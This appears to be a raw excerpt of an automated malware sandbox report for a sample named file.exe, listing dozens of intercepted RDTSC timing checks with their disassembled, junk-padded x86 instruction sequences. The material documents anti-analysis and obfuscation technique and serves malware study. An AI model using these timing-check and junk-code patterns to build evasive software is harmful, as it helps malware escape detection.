Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6029D second address: 4C602A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C602A3 second address: 4C602A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C602A9 second address: 4C602AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C602AD second address: 4C602CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0F345319F5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70078 second address: 4C700AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, edx 0x0000000f call 00007F0F34BEC14Fh 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0ADE second address: 4CA0B1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 pushfd 0x00000006 jmp 00007F0F345319EAh 0x0000000b jmp 00007F0F345319F5h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F0F345319EEh 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0B1E second address: 4CA0B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0B22 second address: 4CA0B26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0B26 second address: 4CA0B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80161 second address: 4C80167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80167 second address: 4C8017B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC150h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C8017B second address: 4C8017F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C8017F second address: 4C801F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F0F34BEC14Dh 0x00000012 sbb eax, 5C9434B6h 0x00000018 jmp 00007F0F34BEC151h 0x0000001d popfd 0x0000001e jmp 00007F0F34BEC150h 0x00000023 popad 0x00000024 and dword ptr [eax], 00000000h 0x00000027 pushad 0x00000028 mov dx, cx 0x0000002b pushfd 0x0000002c jmp 00007F0F34BEC14Ah 0x00000031 sbb ecx, 6ABEDF08h 0x00000037 jmp 00007F0F34BEC14Bh 0x0000003c popfd 0x0000003d popad 0x0000003e and dword ptr [eax+04h], 00000000h 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 mov ecx, ebx 0x00000047 mov si, dx 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C801F4 second address: 4C801FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70CD1 second address: 4C70CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC14Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70CE2 second address: 4C70CE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70CE6 second address: 4C70D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0F34BEC153h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70F85 second address: 4C70F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA02B7 second address: 4CA02F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC158h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov ax, dx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0F34BEC155h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA02F2 second address: 4CA02F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA02F8 second address: 4CA034F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0F34BEC150h 0x00000011 and eax, 1F647128h 0x00000017 jmp 00007F0F34BEC14Bh 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, ecx 0x0000001f jmp 00007F0F34BEC156h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F0F34BEC14Eh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA034F second address: 4CA039E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov al, 73h 0x0000000d movsx ebx, si 0x00000010 popad 0x00000011 mov eax, dword ptr [76FB65FCh] 0x00000016 jmp 00007F0F345319F8h 0x0000001b test eax, eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0F345319F7h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA039E second address: 4CA03DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0FA6E7F6F1h 0x0000000f pushad 0x00000010 mov edi, esi 0x00000012 mov si, 8C8Fh 0x00000016 popad 0x00000017 mov ecx, eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0F34BEC151h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03DE second address: 4CA03FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03FC second address: 4CA0400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0400 second address: 4CA0406 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0406 second address: 4CA0458 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c pushad 0x0000000d jmp 00007F0F34BEC154h 0x00000012 pushfd 0x00000013 jmp 00007F0F34BEC152h 0x00000018 add ch, 00000028h 0x0000001b jmp 00007F0F34BEC14Bh 0x00000020 popfd 0x00000021 popad 0x00000022 ror eax, cl 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0458 second address: 4CA045C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA045C second address: 4CA0462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0462 second address: 4CA0468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0468 second address: 4CA046C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA046C second address: 4CA04BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 jmp 00007F0F345319F0h 0x0000000e retn 0004h 0x00000011 nop 0x00000012 mov esi, eax 0x00000014 lea eax, dword ptr [ebp-08h] 0x00000017 xor esi, dword ptr [00A42014h] 0x0000001d push eax 0x0000001e push eax 0x0000001f push eax 0x00000020 lea eax, dword ptr [ebp-10h] 0x00000023 push eax 0x00000024 call 00007F0F387D1DAEh 0x00000029 push FFFFFFFEh 0x0000002b pushad 0x0000002c mov ebx, 5E8B5FD0h 0x00000031 popad 0x00000032 pop eax 0x00000033 jmp 00007F0F345319EFh 0x00000038 ret 0x00000039 nop 0x0000003a push eax 0x0000003b call 00007F0F387D1DC1h 0x00000040 mov edi, edi 0x00000042 pushad 0x00000043 movzx eax, bx 0x00000046 call 00007F0F345319F1h 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA04BB second address: 4CA0514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push esp 0x00000007 pushad 0x00000008 movzx ecx, bx 0x0000000b pushfd 0x0000000c jmp 00007F0F34BEC155h 0x00000011 sbb ecx, 31BDE066h 0x00000017 jmp 00007F0F34BEC151h 0x0000001c popfd 0x0000001d popad 0x0000001e mov dword ptr [esp], ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F0F34BEC158h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0514 second address: 4CA051A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50050 second address: 4C5006F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0F34BEC151h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5006F second address: 4C50084 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50084 second address: 4C50094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC14Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50094 second address: 4C500A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0F345319EAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C500A9 second address: 4C500AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C500AF second address: 4C500E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F0F345319EEh 0x00000012 and esp, FFFFFFF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0F345319EAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C500E3 second address: 4C500F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C500F2 second address: 4C5011D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 jmp 00007F0F345319EBh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0F345319F5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5011D second address: 4C50190 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F34BEC157h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e call 00007F0F34BEC150h 0x00000013 pop esi 0x00000014 call 00007F0F34BEC14Bh 0x00000019 pop ecx 0x0000001a popad 0x0000001b push edx 0x0000001c mov edi, eax 0x0000001e pop ecx 0x0000001f popad 0x00000020 xchg eax, ecx 0x00000021 jmp 00007F0F34BEC157h 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F0F34BEC155h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50190 second address: 4C50196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50196 second address: 4C5019A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5019A second address: 4C501A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C501A8 second address: 4C501B9 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov al, D0h 0x00000008 popad 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, dx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C501B9 second address: 4C501CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319EFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C501CC second address: 4C50211 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+10h] 0x0000000e pushad 0x0000000f mov ecx, 5EA97883h 0x00000014 mov dh, ah 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0F34BEC157h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50211 second address: 4C50217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50217 second address: 4C5021B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5021B second address: 4C50235 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50235 second address: 4C50239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50239 second address: 4C5023F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50361 second address: 4C50370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50370 second address: 4C5044E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a or edx, dword ptr [ebp+0Ch] 0x0000000d jmp 00007F0F345319F1h 0x00000012 test edx, 61000000h 0x00000018 jmp 00007F0F345319EEh 0x0000001d jne 00007F0FA680FCCCh 0x00000023 jmp 00007F0F345319F0h 0x00000028 test byte ptr [esi+48h], 00000001h 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F0F345319EEh 0x00000033 adc esi, 3FC30268h 0x00000039 jmp 00007F0F345319EBh 0x0000003e popfd 0x0000003f pushfd 0x00000040 jmp 00007F0F345319F8h 0x00000045 sub eax, 284FD4C8h 0x0000004b jmp 00007F0F345319EBh 0x00000050 popfd 0x00000051 popad 0x00000052 jne 00007F0FA680FC7Dh 0x00000058 pushad 0x00000059 pushfd 0x0000005a jmp 00007F0F345319F4h 0x0000005f jmp 00007F0F345319F5h 0x00000064 popfd 0x00000065 mov bl, ah 0x00000067 popad 0x00000068 test bl, 00000007h 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e mov esi, 024CC12Bh 0x00000073 movzx eax, bx 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5044E second address: 4C5046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC159h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40706 second address: 4C40779 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, ecx 0x0000000d mov di, cx 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F0F345319EFh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F0F345319F6h 0x0000001d mov ebp, esp 0x0000001f jmp 00007F0F345319F0h 0x00000024 and esp, FFFFFFF8h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F0F345319F7h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40779 second address: 4C407B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0F34BEC158h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C407B3 second address: 4C407B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C407B7 second address: 4C407BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C407BD second address: 4C407D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C407D6 second address: 4C407DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C407DA second address: 4C407E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C407E0 second address: 4C40871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0F34BEC155h 0x00000009 xor ah, FFFFFF86h 0x0000000c jmp 00007F0F34BEC151h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F0F34BEC150h 0x00000018 jmp 00007F0F34BEC155h 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ebx, 762DF36Eh 0x0000002a pushfd 0x0000002b jmp 00007F0F34BEC14Fh 0x00000030 xor cx, 141Eh 0x00000035 jmp 00007F0F34BEC159h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40871 second address: 4C40877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40877 second address: 4C4087B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C4087B second address: 4C4088A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C4088A second address: 4C4089B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C4089B second address: 4C408F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, CBh 0x00000005 mov ecx, 37A428BFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], esi 0x00000010 pushad 0x00000011 push esi 0x00000012 mov si, bx 0x00000015 pop edx 0x00000016 jmp 00007F0F345319F8h 0x0000001b popad 0x0000001c mov esi, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F0F345319EDh 0x00000028 xor ecx, 7AD687C6h 0x0000002e jmp 00007F0F345319F1h 0x00000033 popfd 0x00000034 mov ah, 2Ch 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C408F9 second address: 4C408FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C408FF second address: 4C40903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40903 second address: 4C40907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40907 second address: 4C40919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub ebx, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40919 second address: 4C40929 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F34BEC14Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40929 second address: 4C4093F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test esi, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0F345319EBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C4093F second address: 4C409A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0F34BEC14Fh 0x00000008 pop eax 0x00000009 movsx edx, cx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007F0FA6ED1B7Ch 0x00000015 pushad 0x00000016 call 00007F0F34BEC14Eh 0x0000001b pushfd 0x0000001c jmp 00007F0F34BEC152h 0x00000021 and ax, 9788h 0x00000026 jmp 00007F0F34BEC14Bh 0x0000002b popfd 0x0000002c pop esi 0x0000002d pushad 0x0000002e mov cx, bx 0x00000031 mov cx, bx 0x00000034 popad 0x00000035 popad 0x00000036 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C409A8 second address: 4C409AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
